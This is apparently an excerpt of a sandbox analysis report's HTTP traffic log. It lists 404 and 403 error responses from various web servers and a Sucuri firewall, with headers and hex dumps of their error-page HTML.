Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 22 Dec 2023 20:14:53 GMTContent-Length: 4956Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bNdV2bGjoDzFoyg4nVtiqmltaXdWHvrcPG2KAkc3zP6r%2BlmnwYAtb72UaL16leouWYAOWlcDqEUOMN44aE7CF0riRecv6J28Ged%2BLOq7PuB8ki1BB5He7jEIXPfRRV1A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08a7693d8d96-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1703276094.7781710181973115462Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLuKm1ZjblSPwIJojBzuX7KYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalvedazzhOAswFVAg2KYnnUeCxtlpC0aXBR7zlur7Wd7ckyd0b4MYaomcQ0P5YjC9FQ==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,Uh3+FND4gW3xHL7Yw3zy0HOx5fM3NYGU2oh/PYLAjKs=,NiLFJErrWn2MoPxOC1BazFIbQpprQYuCl37UmHUfIeI=,WDMzHiyOL7uW518fW2Byr/DuP81vp3l5jzBVJBZ2tecGEgnzVEHSo/m3CLKFTqPNQdxShfsCZPIcY7uwFqSfuA==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 Data Ascii: 427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Fri, 30 Sep 2022 11:47:19 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTServer: ApacheX-Powered-By: PHP/8.1.26Cache-Control: no-cache, privateVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 39 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 0d 0a 20 20 20 20 6c 61 6e 67 3d 22 65 6e 20 22 0d 0a 20 20 20 20 64 61 74 61 2d 74 65 78 74 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 0d 0a 20 20 20 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 49 73 6d 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 63 73 73 2f 63 75 73 74 6f 6d 2f 6c 6f 61 64 65 72 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 6a 73 2f 63 6f 72 65 2f 73 63 72 69 70 74 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 76 65 6e 64 6f 72 73 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 75 69 2f 70 72 69 73 6d 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 65 78 74 65 6e 73 69 6f 6e 73 2f 73 77 65 65 74 61 6c 65 72 74 32 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTServer: ApacheUpgrade: h2Connection: UpgradeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal;
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: IPB17Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 35 31 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 66
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: 2FA2Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 